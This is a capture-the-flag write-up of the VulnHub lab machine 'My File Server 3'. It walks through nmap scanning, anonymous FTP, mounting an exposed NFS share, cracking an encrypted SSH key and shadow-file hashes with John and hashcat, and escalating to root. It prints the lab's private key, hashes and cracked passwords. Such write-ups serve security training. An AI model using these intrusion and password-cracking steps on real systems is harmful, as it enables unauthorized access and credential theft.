VulnHub Link: https://www.vulnhub.com/entry/ck-03,464/
Description:
This box is upgraded edition of previous (MyFileServer 2) box.Multiple way to get user and root flags are added.Ping me on twitter @CyberKnight00 if you face any difficulty.Don't stop after finding 1 way there are more ways.This works better with VirtualBox than VMware.
So no hints for this box just the fact that this box had many ways to get in and get the root ! …
as a start and as always a quick nmap scan:
C:\Users\ADMIN\Desktop
> nmap -sC -sV 192.168.56.104
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-14 20:24 GMT Daylight Time
Nmap scan report for 192.168.56.104
Host is up (0.00049s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 3 0 0 16 Feb 19 07:48 pub [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.1
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 75:fa:37:d1:62:4a:15:87:7e:21:83:b9:2f:ff:04:93 (RSA)
| 256 b8:db:2c:ca:e2:70:c3:eb:9a:a8:cc:0e:a2:1c:68:6b (ECDSA)
|_ 256 66:a3:1b:55:ca:c2:51:84:41:21:7f:77:40:45:d4:9f (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS))
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS)
|_http-title: My File Server
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100003 3,4 2049/udp nfs
| 100003 3,4 2049/udp6 nfs
| 100005 1,2,3 20048/tcp mountd
| 100005 1,2,3 20048/tcp6 mountd
| 100005 1,2,3 20048/udp mountd
| 100005 1,2,3 20048/udp6 mountd
| 100021 1,3,4 34992/udp6 nlockmgr
| 100021 1,3,4 41808/tcp nlockmgr
| 100021 1,3,4 52002/udp nlockmgr
| 100021 1,3,4 58434/tcp6 nlockmgr
| 100024 1 37928/tcp status
| 100024 1 40190/udp6 status
| 100024 1 40894/udp status
| 100024 1 42136/tcp6 status
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
445/tcp open netbios-ssn Samba smbd 4.9.1 (workgroup: SAMBA)
2049/tcp open nfs_acl 3 (RPC #100227)
2121/tcp open ftp ProFTPD 1.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 3 root root 16 Feb 19 07:48 pub [NSE: writeable]
MAC Address: 08:00:27:85:72:62 (Oracle VirtualBox virtual NIC)
Service Info: Host: FILESERVER; OS: UnixHost script results:
|_clock-skew: mean: -1h50m00s, deviation: 3h10m31s, median: -1s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.1)
| Computer name: localhost
| NetBIOS computer name: FILESERVER\x00
| Domain name: \x00
| FQDN: localhost
|_ System time: 2020-04-15T00:54:54+05:30
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-04-14T19:24:57
|_ start_date: N/AService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.04 seconds
We have (8) opened ports and that lot …
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
21 (ftp) ==> vsftpd 3.0.2 — Anonymous FTP login allowed
22 (ssh) ==> OpenSSH 7.4
80 (http) ==> Apache httpd 2.4.6
111 (rpc) ==> rpcbind 2–4 (RPC #100000)
139 (netbios-ssn) ==> Samba smbd 3.X — 4.X (workgroup: SAMBA)
445 (netbios-ssn) ==> Samba smbd 4.9.1
2049 (nfs) ==> nfs_acl 3 (RPC #100227)
2121 (ftp) ==> ProFTPD 1.3.5 — Anonymous FTP login allowed
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
The first thing I’ve to check is the webpage
Nothing in the source page .. We start DirBuster and files/folders brute forcing and we got nothing … !
We have to go back to the ftp server’s and The Anonymous login
This was from the port 21 and am sure we’ll get the same in the port 2121 unless he is using a different path …
let’s see what we have inside the folder pub
and
We have some log files … the most useful for us are the lastlog (records the last logged users) and wtmp (records all logins and logouts)
This tool decode the wtmp file (https://github.com/hjacobs/utmp)
but I prefer reading it with notepad++ :p (Sorry for the awe-full view)
But we got from that 2 users : smbuser and root ( of course :D )
And as I said before the 2121 port use the same path
So we don’t need the ftps anymore cause we don’t own many privileges …
Let’s go back to nmap log and to the port 111
What the port 111 is !?
I don’t want how to explain the role of it but, from my experience I know it about share some folders and mount its in another computer ( in the same host )
and from googling I quote that
Portmapper is an RPC service, which always listens on tcp and udp 111,
and is used to map other RPC services (such as nfs, nlockmgr, quotad,
mountd, etc.) to their corresponding port number on the server.The RPCBind become danger only when we got connection with Network File System (NFS) and I mean with that the port 2049
2049/tcp open nfs_acl 3 (RPC #100227)and if you noticed
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_aclnmap when it show us that in the script use to scan the 111 service and it clear that is connected to the nfs_acl
So how to use all of that … !
C:\Users\ADMIN\Desktop
> showmount -e 192.168.56.104
Exports list on 192.168.56.104:
/smbdata 192.168.56.0/24so after we use showmount in Linux or Windows,
we see that it sharing the folder smbdata in 192.168.56.0/24 my local server of my VirtualBox (the image below explain it more)
Now how to mount this ! I had to use Linux for this (cause am having some troubles in mounting it via my windows)
root@x00xKaliLinux:~# mkdir smbdata
root@x00xKaliLinux:~# mount -t nfs 192.168.56.104:/smbdata ~/smbdata/
root@x00xKaliLinux:~# cd smbdata/So I had to create a directory named smbdata and mount the nfs there and after that we go to that path
root@x00xKaliLinux:~/smbdata# ls -la
total 864
drwxrwxrwx 8 root root 4096 Apr 14 21:01 .
drwxr-xr-x 35 root root 4096 Apr 14 23:31 ..
drwxrwxrwx 2 root root 4096 Feb 18 12:48 anaconda
drwxrwxrwx 2 root root 22 Feb 18 12:48 audit
-rwxrwxrwx 1 root root 6120 Feb 18 12:48 boot.log
-rwxrwxrwx 1 root root 384 Feb 18 12:48 btmp
-rwxrwxrwx 1 root root 4813 Feb 18 12:48 cron
-rwxrwxrwx 1 root root 31389 Feb 18 12:48 dmesg
-rwxrwxrwx 1 root root 31389 Feb 18 12:48 dmesg.old
drwxrwxrwx 2 root root 6 Feb 18 12:48 glusterfs
-rw-r--r-- 1 ab2 ab2 1766 Mar 19 05:43 id_rsa
-rwxrwxrwx 1 root root 292292 Feb 18 12:48 lastlog
-rwxrwxrwx 1 root root 1982 Feb 18 12:48 maillog
-rwxrwxrwx 1 root root 684379 Feb 18 12:48 messages
-rw-r--r-- 1 root root 128 Mar 19 05:53 note.txt
drwxrwxrwx 2 root root 6 Feb 18 12:48 ppp
drwxrwxrwx 4 root root 43 Feb 18 12:48 samba
-rwxrwxrwx 1 root root 11937 Feb 18 12:48 secure
-rwxrwxrwx 1 root root 0 Feb 18 12:48 spooler
-rw-r--r-- 1 99 99 3906 Feb 19 08:46 sshd_config
-rwxrwxrwx 1 root root 0 Feb 18 12:48 tallylog
-rwxr--r-- 1 99 99 162 Feb 25 15:22 todo
drwxrwxrwx 2 root root 22 Feb 18 12:48 tuned
-rwxrwxrwx 1 root root 25728 Feb 18 12:48 wtmp
-rwxrwxrwx 1 root root 100 Feb 18 12:48 xferlog
-rwxrwxrwx 1 root root 10915 Feb 18 12:48 yum.logit looks like we are seeing the same content as FTP with more few new files …
the most sensitive file is the id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0111C403C183156C592743C68EA855BDTRNiuBMH2lIgWgYpBb4MgbhQtW84gdUTJDRQLp/qwBv/KTbycWu+R07J2lGEFJH8
8G1nZ+bjnPayjTyywY5PGySQ4k5pWvmNin16TEAII7XO6Jv+/Ev/N4sPdKe7K3bN
TpJ39S5DVuj4oTTswvUp3dYU6ynu3Qp9PBRdBJnazbK5hwkxOyqa5l1dCfRDpaWf
hPM+GhXbHOvzj+Z9wvlrTuPASsBrCnXd/MAxRmNfDMCHlPHVATEChoP89awwoti5
itxcxqIWGIqilnlm7Dcy2lynE7LlXdXyJAnUI0Plra9PTqC4QoJL3Lyesypzp9Xk
kB9Hv25vherfgjy6AKBcIqZuALtFL2mij7nYC21XxcDudKCaB+UxOQhGBLNN0E16
7bNvnKebLmhyWhDNVaelvF9cd+mxvvPzv5ljhUd3jvhhyU70AgzrpF1ZUxVh2GOs
huzbtCIwX3I+xAQYdw+sThTRG8GcXLjreEUF4gJqlPNWk9gxH/AmfTmGKdLhhoSb
/7wHeMvLwSRaVv6fyPXhPpiB5c3MHCoHFYi6sbmmtYXJBum9fF9iubIzlRu/4vZ2
irmnsEff3vkqqPchb6M0zMtw80QPJgpjhclJjDPiI5P1DWjgLNYOQba0nKNQ3RFa
iy2lup+EsCqWU0KTI+hH+Xm0YAq2/ESqPeNp/U+78y8L5JkpavRYNJyx+vGV8XPP
dGkZD8x68xLIwF6/urZC6utRa1HgyEDIcUbyTUnbRkLUFWbN9eHLrY0pH+zhKJOj
14cUAOpB9RkxAoE6YJ03vJq72OoxfCYhiv3fj4pQRuQJwA2c8IfgdwIJqBIMVPvV
5HX3j5ugkyocLl5Rg+oXjyhNczmABJehk9gA0eCcfQpXGPw/OBMJ4BJdUHxbCOtQ
lAstu+fNBosFhkj3lHXX/ZNIKcYs9+Mvs3E2DvmcK7Us/59qsCwHRZNvd2E3EF9r
nNuHg8sY5HxMvMNH46PH8c4EesuNvOW2pvaCHCT5Id3Up1yyP09hoxyyovnPQ/Gj
HXffEjkc82t9Ip476mfo0NBzB4g7sOb4ZXhG8RxHS4d83S5bITzHP8RrlmkdKCjH
U5YMap/xQ++4XTtgX8DjVoZw1imRtNsCQk6fe0UVKzg2nFV8rkOU8A1o6NDcjE/Z
V/PsYJT3CTEvlzq1/4lLQN2nLrpwmlu+Ate5CEmKxqDIpSIzQBl5N4cU5aa/L1XG
2nFA4H1Ipo7CaUQZ3lQGC/wHaWcP0KnZQ/SrInGOQVu1RJe3MhyG3TyC06FVfmgV
m4oqf39lGQlYX8+cTCK8w6nI6gnSsW92U9j5s9iGEZKN2bI1poyurQaExFiDub6m
QzYWqY1+EUBUYzFMlR08TeHXLvoAmgJNcnZlhXuhWsl6z95UMKvRBLN3Dc4kIVZx
sBZmlYhqhwl0AWYQOl1tJrOMiqLeMhF+xWZ3J/iZ9Pj37Dz9xL8YiA8YUNC/NqT+
3j1s3USXPL0uyxS7tnJJf3aXMBi0XwwHWZg4ii8JQhGiiPhGBE9lpRyPhYCx3xDC
ED/GW22/sWS5fhDr4tynP8VdjiFwbBEcXYHa84XjeUZZaLJQTSwnE/afWVYty8AX
-----END RSA PRIVATE KEY-----
We have a “passphrase key” here and we need to crack it so using ssh2john
root@x00xKaliLinux:~/Desktop# /usr/share/john/ssh2john.py ~/smbdata/id_rsa
/root/smbdata/id_rsa:$sshng$1$16$0111C403C183156C592743C68EA855BD$1200$4d1362b81307da52205a062905be0c81b850b56f3881d5132434502e9feac01bff2936f2716bbe474ec9da51841491fcf06d6767e6e39cf6b28d3cb2c18e4f1b2490e24e695af98d8a7d7a4c400823b5cee89bfefc4bff378b0f74a7bb2b76cd4e9277f52e4356e8f8a134ecc2f529ddd614eb29eedd0a7d3c145d0499dacdb2b98709313b2a9ae65d5d09f443a5a59f84f33e1a15db1cebf38fe67dc2f96b4ee3c04ac06b0a75ddfcc03146635f0cc08794f1d50131028683fcf5ac30a2d8b98adc5cc6a216188aa2967966ec3732da5ca713b2e55dd5f22409d42343e5adaf4f4ea0b842824bdcbc9eb32a73a7d5e4901f47bf6e6f85eadf823cba00a05c22a66e00bb452f69a28fb9d80b6d57c5c0ee74a09a07e53139084604b34dd04d7aedb36f9ca79b2e68725a10cd55a7a5bc5f5c77e9b1bef3f3bf99638547778ef861c94ef4020ceba45d59531561d863ac86ecdbb422305f723ec40418770fac4e14d11bc19c5cb8eb784505e2026a94f35693d8311ff0267d398629d2e186849bffbc0778cbcbc1245a56fe9fc8f5e13e9881e5cdcc1c2a071588bab1b9a6b585c906e9bd7c5f62b9b233951bbfe2f6768ab9a7b047dfdef92aa8f7216fa334cccb70f3440f260a6385c9498c33e22393f50d68e02cd60e41b6b49ca350dd115a8b2da5ba9f84b02a9653429323e847f979b4600ab6fc44aa3de369fd4fbbf32f0be499296af458349cb1faf195f173cf7469190fcc7af312c8c05ebfbab642eaeb516b51e0c840c87146f24d49db4642d41566cdf5e1cbad8d291fece12893a3d7871400ea41f5193102813a609d37bc9abbd8ea317c26218afddf8f8a5046e409c00d9cf087e0770209a8120c54fbd5e475f78f9ba0932a1c2e5e5183ea178f284d7339800497a193d800d1e09c7d0a5718fc3f381309e0125d507c5b08eb50940b2dbbe7cd068b058648f79475d7fd934829c62cf7e32fb371360ef99c2bb52cff9f6ab02c0745936f776137105f6b9cdb8783cb18e47c4cbcc347e3a3c7f1ce047acb8dbce5b6a6f6821c24f921ddd4a75cb23f4f61a31cb2a2f9cf43f1a31d77df12391cf36b7d229e3bea67e8d0d07307883bb0e6f8657846f11c474b877cdd2e5b213cc73fc46b96691d2828c753960c6a9ff143efb85d3b605fc0e3568670d62991b4db02424e9f7b45152b38369c557cae4394f00d68e8d0dc8c4fd957f3ec6094f709312f973ab5ff894b40dda72eba709a5bbe02d7b908498ac6a0c8a52233401979378714e5a6bf2f55c6da7140e07d48a68ec2694419de54060bfc0769670fd0a9d943f4ab22718e415bb54497b7321c86dd3c82d3a1557e68159b8a2a7f7f651909585fcf9c4c22bcc3a9c8ea09d2b16f7653d8f9b3d88611928dd9b235a68caead0684c45883b9bea6433616a98d7e11405463314c951d3c4de1d72efa009a024d727665857ba15ac97acfde5430abd104b3770dce24215671b0166695886a8709740166103a5d6d26b38c8aa2de32117ec5667727f899f4f8f7ec3cfdc4bf18880f1850d0bf36a4fede3d6cdd44973cbd2ecb14bbb672497f76973018b45f0c075998388a2f094211a288f846044f65a51c8f8580b1df10c2103fc65b6dbfb164b97e10ebe2dca73fc55d8e21706c111c5d81daf385e379465968b2504d2c2713f69f59562dcbc017this is the hash we copy it and run john (I used this tool before in this writeup: https://medium.com/p/db5b565c3860)
P.S: I had to go back to my windows but you can use it in your Linux ( I’m just Windows lover :( )
> johntheripper --wordlist=10k_most_common.txt ssh.john
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
password (id_rsa.txt)
1g 0:00:00:00 DONE (2020-04-14 23:32) 4.201g/s 42016p/s 42016c/s 42016C/s booper..eyphed
Session completedC:\Users\ADMIN\Desktop
> johntheripper --show ssh.john
id_rsa.txt:password1 password hash cracked, 0 left
The passphrase key is: password we have to go back to Linux now :p and give the id_rsa some special permissions and try to login with the user “smbuser” (We found previously in the wtmp file)
root@x00xKaliLinux:~/Desktop# ssh -i id_rsa smbuser@192.168.56.104 ##############################################################################################
# InfoSec Warrior #
# --------- www.InfoSecWarrior.com ------------ #
# My File Server - 3 #
# Just a simple addition to the problem #
# Designed By :- CyberKnight #
# Twitter :- @CyberKnight00 #
##############################################################################################Enter passphrase for key 'id_rsa':
Last login: Wed Apr 15 04:03:57 2020 from 192.168.56.1
and that was logged without problems :D no need for any services now !
We could use smbclient 139/445 ports and this is how …
root@x00xKaliLinux:~/smbdata# smbmap -H 192.168.56.104
[+] IP: 192.168.56.104:445 Name: 192.168.56.104
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
smbdata READ, WRITE smbdata
smbuser NO ACCESS smbuser
IPC$ NO ACCESS IPC Service (Samba 4.9.1)
root@x00xKaliLinux:~/smbdata# smbclient \\\\192.168.56.104\\smbdata
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> help
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
more mput newer notify open
posix posix_encrypt posix_open posix_mkdir posix_rmdir
posix_unlink posix_whoami print prompt put
pwd q queue quit readlink
rd recurse reget rename reput
rm rmdir showacls setea setmode
scopy stat symlink tar tarmode
timeout translate unlock volume vuid
wdel logon listconnect showconnect tcon
tdis tid utimes logoff ..
!
smb: \> ls
. D 0 Tue Apr 14 21:01:45 2020
.. D 0 Tue Feb 18 12:47:54 2020
anaconda D 0 Tue Feb 18 12:48:15 2020
audit D 0 Tue Feb 18 12:48:15 2020
boot.log N 6120 Tue Feb 18 12:48:16 2020
btmp N 384 Tue Feb 18 12:48:16 2020
cron N 4813 Tue Feb 18 12:48:16 2020
dmesg N 31389 Tue Feb 18 12:48:16 2020
dmesg.old N 31389 Tue Feb 18 12:48:16 2020
glusterfs D 0 Tue Feb 18 12:48:16 2020
lastlog N 292292 Tue Feb 18 12:48:16 2020
maillog N 1982 Tue Feb 18 12:48:16 2020
messages N 684379 Tue Feb 18 12:48:17 2020
ppp D 0 Tue Feb 18 12:48:17 2020
samba D 0 Tue Feb 18 12:48:17 2020
secure N 11937 Tue Feb 18 12:48:17 2020
spooler N 0 Tue Feb 18 12:48:17 2020
tallylog N 0 Tue Feb 18 12:48:17 2020
tuned D 0 Tue Feb 18 12:48:17 2020
wtmp N 25728 Tue Feb 18 12:48:17 2020
xferlog N 100 Tue Feb 18 12:48:17 2020
yum.log N 10915 Tue Feb 18 12:48:17 2020
sshd_config N 3906 Wed Feb 19 08:46:38 2020
todo N 162 Tue Feb 25 15:22:29 2020
id_rsa N 1766 Thu Mar 19 05:43:16 2020
note.txt N 128 Thu Mar 19 05:53:12 2020 19976192 blocks of size 1024. 18243532 blocks available
going back to our active shell and from now I’ll be active and faster
We have a weird binary file runme with root privileges we run it and see
[smbuser@fileserver ~]$ ./runme Why are you here ?!
So I had to download the file to debug it … (By running python SimpleHTTPServer on port 8080)
Meanwhile I run LinEnum.sh for more … and it says that the shadow file is readable which means that we have some hashes to crack :D
root:$6$zWU8uYN5$iHT030gilg9kM1iYCZt/z3q4fWpSNHwwLElFWof/C3MfbqgmbWAnG5sXFEdkMj60MLvYc6HEB7/REq2u2aVVh0:18317:0:99999:7:::
smbuser:$6$ePvCCtcG$mAQFQldd7/k25o51NK2gkccL24r7DzhrqZGTyjoLlhOCKb060BuB/X6Qlc7noUv61K9NXtaPeWnYRlLWigBfF1:18317:0:99999:7:::
bla:$6$ENV.HdIK$huk85ZxIDwa7jK8W1i0cfV/s67QDyYFaEHVrrpKjYesEJXAiaTo4jtNvfmKD4y1ULhub6gahOVIBaXxcpgm0n.:18317:0:99999:7:::let’s clean this and leave only the hashes, The type of hashes is SHA512 UNIX which means $6$salt$hash .
$6$zWU8uYN5$iHT030gilg9kM1iYCZt/z3q4fWpSNHwwLElFWof/C3MfbqgmbWAnG5sXFEdkMj60MLvYc6HEB7/REq2u2aVVh0
$6$ePvCCtcG$mAQFQldd7/k25o51NK2gkccL24r7DzhrqZGTyjoLlhOCKb060BuB/X6Qlc7noUv61K9NXtaPeWnYRlLWigBfF1
$6$ENV.HdIK$huk85ZxIDwa7jK8W1i0cfV/s67QDyYFaEHVrrpKjYesEJXAiaTo4jtNvfmKD4y1ULhub6gahOVIBaXxcpgm0n.We need to take this to hashcat :D
Bad news: I’ve the most lowest GPU (Nvidia geforce 210) and CPU in the world.
So I had to use a laptop of a friend just to show you the operation
MODE: 1800
TYPE: sha512crypt $6$, SHA512 (Unix)
HASH: $6$72820166$U4DVzpcYxgw7MVVDGGvB2/H5lRistD5.Ah4upwENR5UtffLR4X4SxSzfREv8z6wVl0jRFX40/KnYVvK4829kD1
PASS: hashcatthat was the mode will use in hashcat
D:\hashcat-5.1.0>hashcat64 -m 1800 -a 0 -o found.txt hashes rockyou.txt
hashcat (v5.1.0) starting...* Device #1: This hardware has outdated CUDA compute capability (2.1).
For modern OpenCL performance, upgrade to hardware that supports
CUDA compute capability version 5.0 (Maxwell) or higher.
* Device #2: Intel's OpenCL runtime (GPU only) is currently broken.
We are waiting for updated OpenCL drivers from Intel.
You can use --force to override, but do not report related errors.OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GT 820M, 512/2048 MB allocatable, 2MCUOpenCL Platform #2: Intel(R) Corporation
========================================
* Device #2: Intel(R) HD Graphics 4400, skipped.
* Device #3: Intel(R) Core(TM) i3-4030U CPU @ 1.90GHz, skipped.Hashes: 3 digests; 3 unique digests, 3 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1Applicable optimizers:
* Zero-Byte
* Uses-64-BitMinimum password length supported by kernel: 0
Maximum password length supported by kernel: 256ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.Watchdog: Temperature abort trigger set to 90cDictionary cache built:
* Filename..: rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 5 secsCracking performance lower than expected?* Append -O to the commandline.
This lowers the maximum supported password- and salt-length (typically down to 32).* Append -w 3 to the commandline.
This can cause your screen to lag.* Update your OpenCL runtime / driver the right way:
https://hashcat.net/faq/wrongdriver* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>Session..........: hashcat
Status...........: Running
Hash.Type........: sha512crypt $6$, SHA512 (Unix)
Hash.Target......: hashes
Time.Started.....: Wed Apr 15 20:42:18 2020 (47 secs)
Time.Estimated...: Thu Apr 16 09:58:04 2020 (13 hours, 14 mins)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 601 H/s (10.07ms) @ Accel:32 Loops:16 Thr:32 Vec:1
Recovered........: 1/3 (33.33%) Digests, 1/3 (33.33%) Salts
Progress.........: 36864/43033152 (0.09%)
Rejected.........: 0/36864 (0.00%)
Restore.Point....: 12288/14344384 (0.09%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:3280-3296
Candidates.#1....: gucci1 -> chanda
Hardware.Mon.#1..: Temp: 58c[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>
that bad too :(
Speed.#1.........: 601 H/s (10.07ms) @ Accel:32 Loops:16 Thr:32 Vec:1so now I have the last solution which is asking an online friend and after 5 min
$6$ePvCCtcG$mAQFQldd7/k25o51NK2gkccL24r7DzhrqZGTyjoLlhOCKb060BuB/X6Qlc7noUv61K9NXtaPeWnYRlLWigBfF1:password
$6$zWU8uYN5$iHT030gilg9kM1iYCZt/z3q4fWpSNHwwLElFWof/C3MfbqgmbWAnG5sXFEdkMj60MLvYc6HEB7/REq2u2aVVh0:infosec
$6$ENV.HdIK$huk85ZxIDwa7jK8W1i0cfV/s67QDyYFaEHVrrpKjYesEJXAiaTo4jtNvfmKD4y1ULhub6gahOVIBaXxcpgm0n.:itiseasylet’s try these :D
[smbuser@fileserver ~]$ su -
Password:
Last login: Wed Apr 15 13:27:33 IST 2020 on pts/0
Last failed login: Wed Apr 15 13:33:08 IST 2020 on tty1
There was 1 failed login attempt since the last successful login.
[root@fileserver ~]# pwd
/root
[root@fileserver ~]# ls -la
total 40
drwxr--r--. 4 root root 4096 Feb 27 00:53 .
dr-xr-xr-x. 18 root root 4096 Feb 18 17:17 ..
lrwxrwxrwx 1 root root 9 Feb 25 14:02 .bash_history -> /dev/null
-rwxr--r--. 1 root root 18 Dec 29 2013 .bash_logout
-rwxr--r--. 1 root root 176 Dec 29 2013 .bash_profile
-rwxr--r--. 1 root root 176 Dec 29 2013 .bashrc
-rwxr--r--. 1 root root 100 Dec 29 2013 .cshrc
drwxr--r--. 3 root root 18 Feb 18 15:04 .pki
-rwxr--r-- 1 root root 449 Feb 27 00:27 proof.txt
drwxr--r-- 2 root root 46 Feb 25 15:22 .ssh
-rwxr--r--. 1 root root 129 Dec 29 2013 .tcshrc
-rwxr--r-- 1 root root 6270 Feb 21 12:30 .viminfo
[root@fileserver ~]# cat proof.txt
_______ __ _____ _____
/ ____(_) /__ / ___/___ ______ _____ _____ |__ /
/ /_ / / / _ \\__ \/ _ \/ ___/ | / / _ \/ ___/ ______ /_ <
/ __/ / / / __/__/ / __/ / | |/ / __/ / /_____/ ___/ /
/_/ /_/_/\___/____/\___/_/ |___/\___/_/ /____/
flag : 7be300997079eaebcdf9975ede6746e9
[root@fileserver ~]#
and we’re r00t
for the binary method I’ll try to write about it next time.
Follow me on Twitter : https://twitter.com/ab2pentest
If you liked my writeup and to support me for more :
https://www.buymeacoffee.com/ab2pentest
Other writeup’s and tool’s can be found here:
https://github.com/ab2pentest
